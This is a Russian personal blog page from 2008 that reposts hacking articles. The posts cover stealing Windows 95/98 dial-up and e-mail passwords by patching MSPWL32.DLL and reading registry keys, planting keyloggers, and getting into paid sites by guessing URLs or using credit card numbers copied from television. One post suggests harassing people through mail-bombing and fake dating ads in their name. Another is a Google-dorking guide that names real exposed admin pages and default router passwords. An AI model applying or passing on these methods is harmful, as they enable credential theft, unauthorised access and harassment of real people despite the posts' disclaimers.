-Музыка

 -неизвестно

 -Поиск по дневнику

Поиск сообщений в TaKCuH

 -Подписка по e-mail

 

 -Интересы

я увлекаюсь играя в игру team fortress2

 -Сообщества

Читатель сообществ (Всего в списке: 1) Темы_дня

 -Статистика

Статистика LiveInternet.ru: показано количество хитов и посетителей
Создан: 01.02.2008
Записей:
Комментариев:
Написано: 57





Аудио-запись: Linkin Park From The Inside

Музыка

Четверг, 21 Февраля 2008 г. 13:25 (ссылка) +поставить ссылку

Комментарии (2)Комментировать

Без заголовка

Четверг, 21 Февраля 2008 г. 13:13 + в цитатник
Всё на этой страничке по поводу хакинга!


Понравилось: 21 пользователям

www.Russian-Band.clan.su

Четверг, 21 Февраля 2008 г. 13:11 + в цитатник

Метки:  

Халявный НЕТ

Четверг, 21 Февраля 2008 г. 13:00 + в цитатник
Халявный инет
Все изложенное ниже предназначено только для ознакомления с возможной опасностью и ни в коем случае не должно быть использовано, если это причинит ущерб каким-либо физическим или юридическим лицам. Это может повлечь за собой административную или уголовную ответственность в соответствии с действующим законодательством.
Вступление:
Во все времена были люди, которые старались что-либо утаить от других. Но были и другие: те, которые с этим были не согласны и всячески старались тайны первых узнать. И вот придумали первые вход в Интернет с паролем, ибо денег сие удовольствие стоит, а вторые сразу начали этот пароль отыскивать всеми возможными и невозможными способами.
Когда-то давно пароль пользователь мог выбирать сам. С одной стороны, это было очень удобно: если сам слово заветное это придумал, то уж не забудешь никогда (если только пребывал в этот момент в здравом уме и твердой памяти, но это уже к делу не относится). Пароль же выбирался не просто так: для указанного индивидуума он, чаще всего, нес определенную смысловую нагрузку. И было в этом слабое место данного метода. Теперь только в дешевых фильмах можно увидеть некоего гражданина, копающегося в мусорной корзине своей жертвы в надежде узнать имена, фамилии, даты рождения всех родственников таковой вплоть до десятого колена, а также клички всех их собак, кошек, крыс, хомяков и тараканов. А как же еще: что тебе, например, первым приходит на ум? Конечно: имя твоей (а чаще не твоей) подружки или кличка замученного домашнего животного, ну или слово какое непотребное. Наиболее продвинутые хакеры начали составлять специальные словари с учетом наиболее часто встречающихся в паролях слов.
Все это, в конце концов, положило конец первой стадии и началась вторая: теперь компьютер генерирует некоторую псевдослучайную последовательность букв, цифр и разных знаков препинания. Хорошо-то как стало: "Lta13?Lp" - попробуй подбери! Но тут возникла другая проблема: а попробуй-ка запомни! Пользователи наши начали их на бумажках записывать, ну и периодически... правильно: бумажки терялись, похищались, попадали в мусорную корзину и т.д. - от чего ушли, к тому и пришли! И тогда какая-то умная голова догадалась, что пароль можно хранить не в голове, а прямо на жестком диске. В DialUp-окне галочку поставить и запомнить пароль. У компьютера мозги кремниевые - ему все равно, что запоминать. Ну, а раз запомнили, то, само собой, и записать надо. Ну, а раз записать, то... правильно: отвернулся наш пользователь, а тут толпа голодных до Инета хакеров налетела - и пароль подсмотрела... И тогда пароли стали шифровать. Ну вот, наше вступление закончилось.
Интимные подробности
Где же хранятся пароли в Windows 95/98? Известно где, зашифрованные пароли в Windows 95/98 хранятся в основном каталоге, в файлах с расширением PWL. С учетом того, что не только "у нас здесь", но и "у них там" бывают персональные компьютеры коллективного пользования, да и сети локальные местами встречаются (правда, редко), на каждого пользователя заводится свой PWL. Кстати, название файла соответствует логину данного юзверя. Эти файлы, в принципе, зашифрованы достаточно прилично. Если кому-либо интересно, то, взяв в руки какой-нибудь дизассемблер (HIEW, QVIEW), можно посмотреть процедуру шифрования. Она находится в файле MSPWL32.DLL. Там все очень накручено. Имеется счетчик (назовем его N) от нуля до "сколько надо". Имеются три таблицы. В соответствии со счетчиком N берется байт из первой таблицы (X). По смещению X+N, урезанному до 8 бит, из второй таблицы берется другой байт (Y). Затем по адресу X+Y, опять же урезанному до 8 бит, из третьей таблицы берется третий байт (Z). После столь хитрых манипуляций командой XOR с байтом Z шифруется байт информации, после чего счетчик инкрементируется, и все повторяется сначала (как тебе, а?). Как формируются сами таблицы? Не знаю (мне было лень выяснять). Расшифровывается все это аналогично (той же процедурой), ибо команда XOR обратима. То, какие Винды у тебя стоят - значения не меняет. Не знаю уж, в чьих нездоровых мозгах могла появиться мысль использовать для шифрования команду xor byte ptr [eax+ebp],cl. Может, запутать хотели? Но команда уникальна, такие команды в обычных программах еще поискать надо. Стало быть, ищем соответствующую ей комбинацию 30h, 0Ch, 28h - и все дела. Дальше - просто. Берем MSPWL32.DLL и, со смещения 511h (или там, где найдем), ставим 90h, 90h, 90h - команды NOP (пустая операция). И все, команда не выполняется! Что при этом произойдет? Да ничего! Ничего страшного и даже не очень страшного. И даже никто ничего не заметит!!! Все останется как всегда, с одним лишь исключением: ВСЕ логины/пароли будут ВИДНЫ, так сказать, невооруженным глазом! Тут, правда, есть два неприятных момента. Во-первых, во время работы Windows тебе не удастся подобным образом надругаться над их "святая святых": писать в этот файл нельзя. Значит, придется перегружаться в режиме эмуляции MS-DOS, а это лишнее время, которого может не быть. Во-вторых, а это еще хуже, тебе надо будет стереть ВСЕ PWL'ы, иначе даже в Windows не пустят: а вот тут у законных пользователей могут возникнуть лишние вопросы и подозрения.
Я все так и сделал, скажешь ты, а вот тот юзер в Windows с паролем входил, а мне теперь не войти - пароля-то я не знаю. Что делать? Не беда! Есть способ проще! Уносим ТОЛЬКО USER.DAT! А теперь: Windows 95 - M. D.! Как тебе должно быть известно, кроме интерактивного доступа в Интернет, провайдеры еще и e-mail впаривают суповым набором. Так вот, чтобы залезть в твой почтовый ящик, в тот, что у тебя в подъезде, нужен ключ (или лом). Чтобы залезть в твой e-mail, нужен пароль (или виртуальный лом). И тут я скажу: ВСЕ ПОГОЛОВНО провайдеры в славном городе Москве - M. D.! Пароль к POP3-ящику всегда тот же, что и DialUp! Ну и что? А вот что. Пароль e-mail находится не в PWL'е, а в USER.DAT, и зашифрован он не так сильно, вернее, почти совсем не зашифрован! А это как??? Да вот так! Метод "шифрования" напоминает элементарное UUE-кодирование, иначе говоря, из трех байтов делают четыре или из 8 битов - 10. Весь исходный пароль разбивается на части по три байта. В результирующей строке на один символ отводится 10 битов. Теперь: к каждому байту исходной строки прибавляется 30h, если сумма больше, чем 7Ah, то он становится равен 30h, а к паре 9 и 10 битов добавляется единица. Однако есть исключения. Если общая длина строки пароля не кратна трем, то она дополняется байтами 3Dh. Судя по всему, это 0Dh (конец строки)+30h. В конце строки 0Dh, 0Ah: стандартное завершение. На мой взгляд, подобрать пароль вручную проще, чем написать соответствующую программу: не каждый же день ты эти пароли подбираешь! Где находится пароль - написано ниже, оттуда его и берем. А принцип прост: запускаем Internet Mail, заходим в Сообщение & reg; Параметры/Сервер. Запускаем REGEDIT, переходим в HKEY_CURRENT_USER/Software/Microsoft/InternetMail and News/Mail/POP3/"Твой сервер": смотрим Password. Удаляем пароль в Internet Mail. Первый подбираемый символ влияет на первый и второй байты, второй - на второй и третий, третий - на третий и четвертый. Теперь: подбираем символ так, чтобы первый байт совпал с оригиналом, а второй или совпал, или был самый большой, но меньше оригинала. Аналогично для второго и третьего символов. С подбором третьего символа все четыре байта должны совпасть! Если нет - извини, no sex for you. Естественно, после каждой замены символа жми "Применить". Результат контролируем REGEDIT'ом, переходя вверх/вниз для обновления информации. Когда первые три символа подобраны, возвращаемся к (*) для следующих трех и т.д. до победного конца. Разумеется, байт(ы) 3Dh подбирать не нужно! После некоторой тренировки на все это уходит минут 15.
Где же это счастье хранится? И, вообще, кроме логина и пароля еще многое нужно знать, а откуда, не звонить же провайдеру? Не надо никому звонить! Все в нем, в USER.DAT.

HKEY_CURRENT_USER/RemoteAccess/Addresses: и мы имеем список подключений. Да, но там ничего не видно, цифры какие-то... А ты чего хотел, дружок! Выбираем байт, которого больше всего, и дешифруем им все остальные (обычный XOR). В результате в куче всякой ерунды получаем ASCII-строку с номером модемного телефона провайдера (потеть, конечно, придется, если друг совсем не знакомый или работает партизаном, а знакомого и спросить можно - типа: «Что это за провайдер у тебя такой не хилый, друг ты мой лучший, Миша»?).
HKEY_CURRENT_USER/RemoteAccess/Profile /«подключение»/IP: со смещения 0Ch четыре байта задом наперед - это первичный DNS, затем еще четыре - вторичный и т.д.
HKEY_CURRENT_USER/RemoteAccess/Profile/ »подключение»/User: логин. HKEY_CURRENT_USER/Software/Microsoft/
Windows/CurrentVersion/InternetSettings/ProxyServer: Proxy-сервер и порт.
HKEY_CURRENT_USER/Software/Microsoft/InternetMail and News/Mail:
DefaultPOP3Server:
DefaultSMTPServer:
SenderEMail:
Name:
Organization: это все и так понятно.
POP3 - "POP3-сервер":
Account: это понятно.
Password: ну вот и он, родимый.
Что делать, если пользователь - мазохист? Не хранит он пароль в компьютере, а вводит его каждый раз с клавиатуры? И этому горю можно помочь. Существуют программы типа SPYWIN или HOOKDUMP или KEYWITNESS. Они записывают все действия, производимые на компьютере. Достаточно подсадить одну из них и все... Естественно, их можно использовать и для других не менее интересных целей.
И в конце могу тебе посоветовать: не качай и уж тем более не запускай у себя всякие "взломщики Интернета". Они могут крякнуть только информацию на твоем винчестере! Ибо тот, кто может взломать провайдера, никогда не будет опускаться до таких мелочей, а другие в лучшем случае хотят над тобой просто посмеяться, в худшем - сделать бяку
Эта статья скачана из интернета.
Эта статья предназначена только для ознакомительных целей. Ни в коем случае не реализовывайте на практике то, что Вы прочитаете, так как Вы несете полную ответственность за свои поступки в соответствии с действующим законодательством. Я не отвечаю за достоверность информации и не несу ответственности за Ваши поступки! Все что вы делаете, вы делаете на свой страх и риск!!!

По всем вопросам пишите сюда: TakcuH@mail.ru

Халявный взлом сервака!

Четверг, 21 Февраля 2008 г. 12:55 + в цитатник
Сегодня я расскажу про то как можно халявно влезть на платный сервак. Можно конечно пользоваться сгенеренными кредитками (кстати, в передачи "О, счастливчик!" по НТВ Дебров показывает кредитку. Запиши этот момент на кассету, а потом если внимательно вглядываться можно разглядеть ее номер и пользоваться:)), но я Тебя сегодня познакомлю с другими способами. Начнем с того что большинство сайтов запрашивают логин и пароль только на входе. Тоесть сам сайт хранится в какой-то папке и Тебе никто не мешает набрать в адресной строке браузера адрес на эту папку. Догадаться что это за папка сложно. Поэтому надо воспользоваться вспомогательным софтом. Я рекомендую GRINDER и BlackWidow. Есть и другой способ. Для этого Тебе просто понадобится прога для качания каталогами. Скачиваешь себе порносайт, открываешь его в проводнике. Или в Explorer'е, если у Тебя 95 винды и начинаешь просматривать картинки jpg и gif. Теперь давай представим что Тебе хочется в дальнейшем вернуться сюда. Тогда просто запоминаешь адрес странички с порнухой (разумеется той, которая стоит за чертой MEMBERS) и потом набрав эту строку в браузере Ты сможешь туда вернуться. Даже если срок оплаты истек. Лучше вообще не запоминать адрес а знести его в "Избранное". Допустим что Ты настолько крут, что раздобыл кредитку. Что дальше? А дальше топай на AdultCheck и регистрируйся там. После регистрации там они Тебе выдают ключ с которым Ты можешь лазить по туевой хуче сайтов. Давай рассмотрим еще один вариант пролазинья. Дело в том, что многие порносайты дают демо-доступ. Этим мы и воспользуемся. Рассмотрим пример с сайтом LiveTeen (мой любимый порносайт:)). Каждому какому-то посетителю они дают демо-вход. С этим демо-входом ты можешь у каждой бабы посмотреть по 15 фоток и несколько фоток из видео-файлов. Возьмем к примеру девку по имени Chloe. Адрес первой ее фоток выглядит таким образом: http://www.liveteen.com/*******/Chloe-Caprise/Chloe. Так вот в этой папке лежат файлы с именами chl001.jpg, chl002.jpg, chl003.jpg и так до chl015.jpg. А кто мне мешает ввести chl080.jpg? Да никто! тоже и с видео. Возьмем к примеру файл .../video/amanda/vid001.jpg. Просто меняем jpg на mov и вперед. Возьмем еще сайт "В постели с Аленкой". Он не платный, но чтобы узнать пароль надо где-то час лазать по разным баннерам, один из которых оказывается долбаным (битым, с ошибочным href="..."). на этом поиски пароля заканчиваются. Но нам дают демо вход для просмотра всех картинок в мелком формате. Адрес картинок .../small/*.jpg. Заменяем small на full и смотрим фоты в полнометражном формате. Я догадался что надо поставить слово full с третьего раза (на сайте было написано, что для полного доступа надо ввести пароль). Ну и все. Это не единственные способы, но их Тебе хватит. Ни один сервак не устоит.

Вложение: 3656188_obhodit_sistemu_obnaruzheniya.doc

Рубрики:  Брутерсто

Цитата!

Четверг, 21 Февраля 2008 г. 12:45 + в цитатник
Все находящееся на дневе это информация для 3ащиты собственных компьютеров!:beach:

Месть интернете!

Четверг, 21 Февраля 2008 г. 12:12 + в цитатник
Месть в Internet'е

В качестве инструмента мести Internet идеален. Он представляет массу доселе не использованных возможностей.
Способы испортить жизнь своему недругу, пользуясь Internetом, хороши, прежде всего, легкостью и малым количеством затрачиваемых сил. Месть можно осуществить, что называется, не вставая с дивана. Однако не надо слишком уж полагаться на эту обманчивую легкость. Internet-месть имеет свою специфику, свои плюсы и минусы, и, если забыть о вторых, упиваясь исключительно первыми, то навредить можно в первую очередь себе самому. Давайте попробуем вкратце ознакомиться с различными способами мести через Internet, для удобства разделив их на несколько групп:
• Грубые;
• Пошлые;
• Пролонгированного действия;
• Изысканные.
Грубые
Сюда входят способы мести самые простые и одновременно самые ощутимые. При этом для того, чтобы подгадить неприятному вам персонажу, вам не придется даже использовать возможности World Wide Web. Как правило, будет вполне достаточно обычной электронной почты. Главное - узнать электронный адрес доставляющего вам неприятные эмоции персонажа. А вот что отправить по нему - это уже ваше дело. Хотите - посылайте письмо с вложенным файлом немереного объема. Хотите - отправляйте обычное поздравление с днем рождения, только раз по сто на дню. Особенно удачно, если у вашего недруга есть пейджер: пользуясь возможностью отправлять сообщения на пейджер через Internet и задав при отправке функцию повтора, вы доставите объекту вашей мести немало приятных минут.
Плюсы: простота исполнения в сочетании с ощутимостью ущерба. Применив способы мести из этой группы к вашему недругу, будьте спокойны: ваши Старания непременно будут замечены и оценены.
Минусы: если бы ты, дружок, был знатным хакером, то нужды в подобных способах мести не возникало бы: твои враги, имеющие доступ в Internet, и без этого старались бы тебя не задевать ни словом, ни взглядом. А если твои познания в компьютерной области далеки от всесторонних, то вычислить источник вредоносных действий для твоего врага не составит труда. И ответная месть, как водится, будет жестокой и кровавой. А так ли уж ты не дорожишь своим собственным пейджером и почтовым ящиком?..
Пошлые
Тоже несложны в исполнении. Нужно лишь разместить объявление о знакомстве от имени вашего недруга/недругини на досках объявлений для лиц той сексуальной ориентации, к которой недруг не имеет чести принадлежать. Ближайшие дни ему придется провести, объясняя свои сексуальные пристрастия людям, жаждущим знакомства, но принадлежащим к совершенно не интересующему его полу...
Плюсы: могут не вычислить. К тому же надподобной операцией можно посмеяться в компании, если, конечно, средний возраст участников компании не превышает 13 лет, а средний коэффициент интеллекта - 80 единиц.
Минусы: Полюбоваться на дело рук своих все равно не получится. А не отслеженная собственными глазами месть - это почти и не месть вовсе.
Пролонгированного действия
Способ особенно хорош для покинутых жен и любовниц - разместить от его имени объявление о знакомстве в правильном разделе. Потратив несколько месяцев на переписку с девушками, отсеивание тех, кто не в состоянии написать без ошибок слово длиннее трех букв, он, наконец, приступит к серии свиданий. Во время которых непременно обнаружит, что слова "красивая", "стройная", "умная" он и девушки понимают по-разному, а отсканировать собственную фотографию для юной леди не в пример сложнее, чем взять из Сети первую попавшуюся фотографию фотомодели и прицепить ее к письму о себе. Скорее всего, со временем он даже придет к выводу, что ты - лучшее, что он встретил на своем пути. Если же причиной расставания стало твое патологическое нежелание заниматься домашним хозяйством - то можно разместить на каком-нибудь сайте для домохозяек невинный вопрос от его имени. Например, о том, как приготовить борщ. С обратным адресом, разумеется. В ближайшие дни его почтовый ящик будет переполнен рекомендациями примерных кулинарок, а он наконец-то поймет, что от избытка хозяйственности тоже можно взвыть...
Плюсы: все по-честному.
Минусы: а вдруг он и вправду встретит свое нелегкое счастье? Ты же век себе этого не простишь!
Изысканные
Оплати своему недругу нелимитированный доступ в Internet на несколько месяцев вперед. Чем на больший срок тебя хватит, тем на большими срок твой недруг выпадет из жизни в виртуальное пространство. Пользуясь неожиданно свалившимся на нею счастьем, он забудет о родных, друзьях и работе. В конце концов друзья от него отвернутся, семья разбежится, с работы уволят... а когда оплаченный тобой доступ закончится, он за несколько дней исчахнет от горя. А разве не этого ты добиваешься?
Минусы: дорого.
Плюсы: все остальные.
Мстите на здоровье. Впрочем, помните, что месть разрушает в первую очередь мстящего.
Рубрики:  Брутерсто

Лучший друг хакера!***?

Четверг, 21 Февраля 2008 г. 12:10 + в цитатник
За последние несколько лет появилось множество статей, которые предупреждают о том, что хакеры (или cracker'ы, если хотите) используют поисковую систему google для получения доступа к файлам, к которым, по идее, они доступа иметь не должны. То, что я расскажу вам, возможно, кто-то уже давно использует в своих целях, но мне всегда было интересно самому узнать, как это работает. В 2001 году, James Middleton написал статью для vnunet.com, в которой шла речь об использовании хакерами специальных слов в поисковой машине google, для нахождения важной банковской информации:
"В сообщении, находившемся в одной из security конференций было сказано, что введя 'Index of / +banques +filetype:xls' в строку поиска, в конечном счете можно было заполучить важные / секретные таблицы Excel из Французских банков. Та же самая технология может быть использована для поиска файлов с паролями"[1]
В другой статье, которая появилась на wired.com, рассказывается, как Adrian Lamo, хакер, часто попадающий в сводки компьютерных преступлений, использовал Google, чтобы получить доступ к web сайтам крупных корпораций.
"Например, введя фразу "Select a database to view" - обычная фраза, используемая в FileMaker Pro database interface" - Google выдает примерно 200 ссылок, большинство из которых ведут на страницу с доступом к FileMaker для всех пользователей."[2]
Подобные статьи продолжали и продолжали появляться в internet. Правительственные и Военные сайты Соединенных Штатов были тоже уязвимы, потому что скрипты, используемые админами, можно было легко найти с помощью google. Медицинские карты, личные записи - все могло неожиданно оказаться в руках пользователей этой поисковой системы. Но в статьях никогда не было описано, как можно использовать Google в "таких" целях. Даже пример строки, которую вводил хакер, не предоставлялся широкой аудитории. После того, как я последний раз прочитал подобную статью, я решил, что пора самому во всем разобраться - действительно ли google позволяет делать все то, о чем так много раз упоминалось в различных докладах. Следующий текст является результатом моих исследований.
Теория
На самом деле, теория очень проста. Чтобы получить интересующую вас информацию, вам нужно попробовать представить, в каких файлах эта информация может находиться, а затем просто попытаться их найти. (Например, попробуйте поискать *.xls файлы). Или же вы можете избрать более интересный подход - подумать, какой софт, установленный на атакуемой машине, предоставляет возможность выполнять нужные вам задачи, затем ввести критические/опасные файлы этого программного обеспечения в строку поиска. Примером может послужить система управления содержанием сайта (content management system). Вам нужно исследовать эту систему, выяснить, какие файлы она в себя включает, а затем воспользоваться google. Но вернемся к примеру о базе данных, рассмотренном чуть выше. Вы знаете, что строка "view database" находится на тех web страницах, которые не должны быть вам доступны. Следовательно, вам остается только найти страницы, в которых содержится данная строка или же узнать, что, например, опция "view database" ссылается на страницу "viewdbase.htm", то есть ее и надо будет ввести в строку поиска.
Самое главное - четко поставить перед собой цель и знать, что вы хотите найти. Только после этого вы можете воспользоваться Google.
Опции поиска Google
Специальные типы файлов: *.xls, *.doc, *.pdf *.ps *.ppt *.rtf
Google позволяет искать специальные типы файлов, то есть, как результат поиска, вы получаете не html-страницы (web сайты), а, например, файл Microsoft Excel. Вот что нужно ввести в строку поиска:
Filetype:xls (для файлов excel) или filetype:doc для файлов Word.
Наверное, будет интереснее найти файлы *.db и *.mdb. Можно поискать и другие типы файлов. Первое, что приходит на ум - *.cfg или *.pwd, *.dat файлы и т. п. Сначала подумайте, какие файлы могут содержать ценную информацию.
Inurl
Еще одна полезная опция при поиске - inurl: опция, которая позволяет искать заданные слова в url. Это дает вам возможность искать нужные каталоги.
Пример: inurl:admin Результатом поиска станут web-сайты, у которых в url имеется слово "admin".
Index of
Опция "index of" тоже не до конца продумана разработчиками google, но нам она очень пригодится. Если вы используете опцию "index of", то как результат, google вам покажет листинг директории на сервере. Вот пример:
"index of" admin или index.of.admin
В результате вы получите листинг множества директорий 'admin'.
Site
Опция "site" позволяет показывать результаты поиска только по определенному домену или сайту. Например, вы можете искать как на всех .com или .box.sk или .nl сайтах, так и только на одном сайте. Будет очень интересно поискать на военных и правительственных сайтах. Вот пример строки поиска:
Site:mil или site:gov
Site:neworder.box.sk "board"
Intitle
Intitle - еще одна интересная опция. Она позволяет вам искать html файлы, в заголовке которых присутствует нужное вам слово или комбинация слов. Строка поиска при этом будет выглядеть так: intitle:здесь_слово. Вы можете узнать, какие слова присутствуют в заголовке, скажем, той же системы управления содержанием сайта, а затем искать эти слова в google, используя при этом опцию Intitle. В результате, вы получите доступ к подобным системам на других сайтах.
Link
Опция Link позволяет вам узнать, на каких web страницах есть ссылка на указанный вами сайт. Как описано в книге 'Hacking Exposed Third Edition' (Секреты Хакеров Третье Издание), эту опцию мы также можем использовать в своих целях.
Комбинируем опции при поиске
Все вышеупомянутые опции могли быть, а могли и не быть вам известны. В любом случае, используя их, мы получим интересный результат. Факт остается фактом - свою магическую силу google проявляет тогда, когда мы начинаем комбинировать друг с другом эти опции. Например, можете попробовать поискать это:
inurl:nasa.gov filetype:xls "restricted" или это: site:mil filetype:xls "password" или может быть это: site:mil "index of" admin
(Эти примеры я взял из головы и не знаю, выдаст ли google что-нибудь интересное. Вам необходимо найти такое сочетание опций, чтобы получить ожидаемый результат).
Примеры; Практический Материал
Специальные типы файлов: *.xls, *.doc, *.pdf *.ps *.ppt *.rtf
Для начала, попробуйте поискать те файлы, в которых, вы думаете, находится интересующая вас информация. Для меня очевидным выбором стали следующие вещи:
Password, passwords, pwd, account, accounts, userid, uid, login, logins, secret, secrets. Конечно, все эти слова я искал с расширением *.doc, *.xls и *.db
Вот и появились первые интересные результаты, особенно, если искать файлы с расширением *.db. Правда, пароли я также находил и в *.doc файлах.
http://www.doc.state.ok.us/Spreadsheets/private%20prison%20survey%20for%20web.xls
http://www.bmo.com/investorrelations/current/current/suppnew/private.xls
http://www.nescaum.org/Greenhouse/Private/Participant_List.xls
http://www.dscr.dla.mil/aviationinvest/attendance_5Apr01.xls
http://web.nps.navy.mil/~drdolk/is3301/PART_IS3301.XLS
Admin.cfg
Admin.cfg, в большинстве случаев, конфигурационный файл админа. Многие разработчики софта также используют имена типа "config", "admin" или "setup". Часто такие файлы содержат чувствительную информацию и поэтому они не должны быть доступны большинству людей. Я попытался поискать файл admin.cfg, используя следующую строку поиска:
inurl:admin.cfg "index of"
В результате, google выдала множество файлов, среди которых были очень интересные ;). Я, например, нашел файл: http://www.alternetwebdesign.com/cgi-bin/directimi/ admin.cfg, в котором находились пароли. Один пароль был от базы данных, которая находилась по адресу: http://www.alternetwebdesign.com/cgi-bin/directimi/ database.cgi?admin.cfg. В базе данных находилась конфиденциальная информация клиентов этой компании. Я решил связаться с этой компанией и рассказать об уязвимости. Люди там оказались дружелюбные и сказали, что в ближайшее время постараются залатать брешь.
Webadmin
Некоторое время назад, когда я работал над этой статьей, я зашел на web сайт:
http://wacker-welt.de/webadmin/
Там было написано, что "webadmin" позволяет удаленно редактировать содержимое web сайта, загружать файлы и т.д. Главная страничка центра управления (control center) webadmin называется "webeditor.php". Очевидно, что следующим моим шагом стало посещение google и использование опции 'inurl', чтобы найти страницы webeditor.php. Вот, что я ввел в строке поиска:
inurl:webeditor.php
и вот, что я нашел:
http://orbyonline.com/php/webeditor.php
http://www-user.tu-chemnitz.de/~hkri/Neuer%20Ordner/webeditor.php
http://artematrix.org/webeditor/webeditor.php
http://www.directinfo.hu/kapu/webeditor.php
Ко всем этим файлам доступ был неограничен, а все потому, что владельцы сайтов не потрудились поставить (правильно) защиту, используя .htaccess. Подобная ошибка позволяет абсолютно любому пользователю интернета заменять web страницы на сервере, а, следовательно, и дефейсить сайт. Возможность загружать свои файлы дает возможность получить полный доступ к серверу.
Походив по этим сайтам, я заметил, что файл, позволяющий загружать файлы, называется "file_upload.php". Затем в дело вступает google.
http://www.hvcc.edu/~kantopet/ciss_225/examples/begphp/ch10/file_upload.php
Вот хороший пример:
http://www.pelicandecals.com/admin/webeditor.php
Данный скрипт позволяет вам изменять файлы, как и в предыдущих примерах, включая index.php. По идее, любой заинтересованный человек может изменить существующий или загрузить свой скрипт на сервер и выполнить его. О последствиях, думаю, упоминать не стоит.
Там также присутствовала ссылка "Return Administration", кликнув по которой, я оказался здесь:
http://www.pelicandecals.com/admin/administration.html
Тут была доступна информация о покупателях, возможность менять цены на товары и т.д.
Системы управления содержанием сайта
Системы управления содержанием сайта - это программы, позволяющие web мастерам редактировать, изменять содержимое web сайта. Тоже относится и к панелям управления web сайтов. Суть заключается в том, что вам надо определить, какие файлы являются ключевыми в данном продукте. Таким файлом может быть "cms.html", "panel.html" или "control.cfg".
Frontpage Server Extensions HTML Administration Forms
"Вы можете удаленно администрировать FrontPage Server Extensions с любого компьютера, подключенного к internet, используя FrontPage Server Extension HTML Administration Forms."
Вот, что говорит об этом документация Microsoft. Это значит, пользователи, имеющие доступ к этим формам, могут выполнять некоторые функции администратора, удаленно. А это значит, что формы должны быть хорошо защищены от неавторизованных пользователей. Ну что, как насчет поискать такие формы в интернете? Первое, что нам нужно сделать - выяснить, какие файлы использует этот софт. Краткий визит на web сайт Microsoft или беглый взгляд в документацию FrontPage покажет, что главной страницей всех форм администратора является "fpadmin.htm". Именно этот файл мы и будем искать. Но, сначала, мы должно правильно подобрать те опции, которые будут использоваться в строке поиска, чтобы получить нужный нам результат. Если проводится установка по умолчанию, то все файлы помещаются в директорию "admin". Вспомнив все, что мы узнали об опциях google и теории поиска, ожидаемый результат может выдать строка поиска типа:
inurl:fpadmin.htm "index of" admin или inurl:admin/fpadmin.htm
А вот и полученные при поиске результаты:
http://www.lehigh.edu/~ineduc/degree_programs/tbte/admin/
http://blackadder.eng.monash.edu.au/frontpage/admin/
http://www.lehigh.edu/collegeofeducation/degree_programs/tbte/admin/
http://www.vsl.gifu-u.ac.jp/freeman/frontpage4/admin/
http://www.tech-geeks.org/contrib/loveless/e-smith...02/frontpage/version5.0/admin/ 1033/fpadmin.htm
http://fp.nsk.fio.ru/admin/1033/fpadmin.htm
Вот что еще написано в документации к FrontPage:
"Из соображений безопасности, HTML Administration Forms сразу после установки не активны, что не позволит удаленно администрировать FrontPage из web браузера."
Это означает только одно - некоторые ссылки, которые выдала нам поисковая система google, могут оказаться бесполезными и есть только один способ проверить их работоспособность - попробовать воспользоваться некоторыми функциями администратора и посмотреть на результат. Я решил не заходить так далеко, чтобы не нарушать закон. Но я здесь не для того, чтобы учить вас хорошим манерам, по крайней мере сегодня.
Freesco Router
Программное обеспечение Freesco router для Linux по умолчанию устанавливает маленький браузер, который позволяет владельцам контролировать работу роутера через http протокол. По умолчанию, логин и пароль для панели управления - "admin". Очень многие пользователи freesco не знают об этом. Вы можете поискать панель управления Freesco роутеров, использую следующую строку:
intitle:"freesco control panel" или "check the connection" эти слова находятся либо в заголовках страниц, либо на самих страницах. Все сводится к одному - вы должны изучить софт, найти те его части, которые отвечают за что-то важное (та же страница администратора) и составить такую строку, воспользовавшись которой, вы получите доступ к этим самым частям.
Дополнительные советы
Запомните, Английский, самый распространенный в интренете язык, но он не единственный. Пробуйте искать слова или строки из вашего родного языка или Французского или Немецкого и т.д. Например, "beeheer" по-немецки означает "администрация".
Вы можете использовать строки из списка уязвимостей любого сканера безопасности (security scanner). За примерами можно обратиться сюда: http://paris2k.at.box.sk/ listings/
Пробуйте искать файлы "config.inc.php" или "mysql.cfg" - они могут содержать комбинации логин-пароль от базы данных MySQL. Попробуйте в строке поиска использовать слова PHP, SQL, mySQL и т.д.
Попробуйте следующие комбинации: inurl:admin "index of" "database" или inurl:phpmyadmin "index of" или inurl:mysql "index of" site:neworder.box.sk intitle:index.of или intitle:index.of.private( =intitle:"index of private")
Заключение
Internet - это сеть, к которой подключены сотни тысяч, а то и миллионов web серверов и по идее, можно получить доступ к любым данным, конечно, если они не защищены подобающим образом. Как разработчики программного обеспечения, так и конечные пользователи должны уделять больше внимания конфигурации защиты, устанавливаемой по умолчанию и политике безопасности. В конце концов, всегда найдутся люди, которые допускают ошибки, устанавливают все по умолчанию, используют плохо защищенное программное обеспечение и совсем об этом не беспокоятся или все еще верят, что ничего не произойдет если они поместят все это в таком виде в интернет. Но все же находятся любопытные личности, которым нравится находить интересную информацию не для посторонних глаз. Google может вам значительно помочь в таких делах, к тому же это совсем не трудно.

Метки:  

Будушее в качестве хакера!!!

Четверг, 21 Февраля 2008 г. 12:02 + в цитатник
Ваше будущее в качестве хакера
Многие хакеры и не хакеры излагают свои версии “хакерской этики”, и почти все версии похожи друг на друга. Но часто крутые ребята-хакеры сначала следуют принципам, моральным установкам — Кодексу чести, — а затем их уводит в сторону. Им начинает казаться, что, зная закон, они получают право его нарушать: “Мы не действуем вслепую”. Так поступают крутые ребята — они знают, что они крутые, забывая при этом, что порой даже самые крутые хакеры на поверку оказываются полными тупицами.

Я хочу изложить вам свою собственную версию хакерского Кодекса чести. Это список моих убеждений, относящихся к миру компьютеров. Возможно, у вас совсем другие убеждения, но это не страшно — хакеры люди независимые. Впрочем, я хочу, чтобы вы поняли, почему так важно сформулировать кодекс чести и следовать ему. Это может уберечь вас от неприятностей. Я не хочу сказать, что, если вас поймают, суд обратит внимание на то, что вы вели себя в соответствии со своими принципами, особенно если эти принципы включают в себя незаконную деятельность. Я имею в виду, что мне хотелось бы верить в следующее: если вы сформулировали свой моральный кодекс, и если все хакеры из вашего круга подпишут заверения в своей верности этому кодексу, то, быть может, судья или присяжные скажут себе: “Господи, да ведь он не собирался причинять никакого вреда”. Вы, возможно, помните наш разговор об умышленном причинении вреда. Хотелось бы думать, что суд обратит на это внимание, хотя в действительности люди редко пытаются посмотреть на веши с чужой точки зрения. По крайней мере, обладая кодексом чести, вы сможете избавиться от нежелательных людей, и участники вашей группы будут счастливы и в безопасности. Но еще более важно то, что в подобном кодексе, которому вы следуете, присутствует какая-то необъяснимая скрытая ценность. Вам кажется, что я читаю вам проповеди? Ну что ж, я не стану спорить. Вот мой Кодекс Чести Хакера. Здесь мои принципы, касающиеся компьютеров и хакерства, которым я стараюсь следовать.

Мой кодекс: чести

